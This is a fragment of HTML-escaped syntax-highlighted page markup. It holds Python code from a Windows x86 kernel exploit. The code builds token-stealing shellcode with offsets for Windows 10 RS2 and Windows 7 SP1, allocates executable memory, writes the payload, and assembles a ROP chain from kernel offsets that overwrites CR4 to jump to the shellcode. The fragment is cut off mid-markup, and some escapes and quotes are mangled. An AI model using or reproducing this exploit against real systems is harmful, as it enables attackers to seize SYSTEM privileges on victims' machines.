jnz&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -&gt;|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-51\">&nbsp;<\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># win 10 rs2 x86 TOKEN_OFFSET = 0xfc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># win 07 sp1 x86 TOKEN_OFFSET = 0xf8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x8b\\x90\\xfc\\x00\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov edx, [eax + TOKEN_OFFSET]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x89\\x91\\xfc\\x00\\x00\\x00&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov [ecx + TOKEN_OFFSET], edx<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># --[ recover]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&quot;\\x61&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># popad<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x83\\xc4\\x0c&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># adjust the stack by 0xc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x31\\xc0&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># return NTSTATUS = STATUS_SUCCESS<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\xc3&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># ret<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># filler<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x43&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">NtAllocateVirtualMemory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argtypes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">POINTER<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_ulong<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5a42caec3600a215264132-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">POINTER<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">NtAllocateVirtualMemory<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">baseadd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-68\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">MEM_RESERVE<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">MEM_COMMIT<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">PAGE_EXECUTE_READWRITE<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">STATUS_SUCCESS<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;(-) Error while allocating memory: %s&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dwStatus<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">written<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_ulong<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kernel32<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">WriteProcessMemory<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">byref<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">written<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">write<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;(-) Error while writing our input buffer memory: %s&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">write<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-78\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-81\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">alloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">baseadd<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">base<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">c_int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;\\x44&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x40<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># offset to ip<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-85\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># start our rop chain<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x51976f<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># pop ecx; ret<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x75757575<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># junk<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x76767676<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># junk<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># load 0x506f8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x04664f<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov eax, [ecx]; ret<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x22f2da<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-p\"># mov cr4,eax; ret<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &amp;shellcode<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-94\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># filler<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x43&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input_size<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">input<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ntdll<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">NtAllocateVirtualMemory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argtypes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-e\">POINTER<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_ulong<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-99\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">POINTER<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c_int<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div 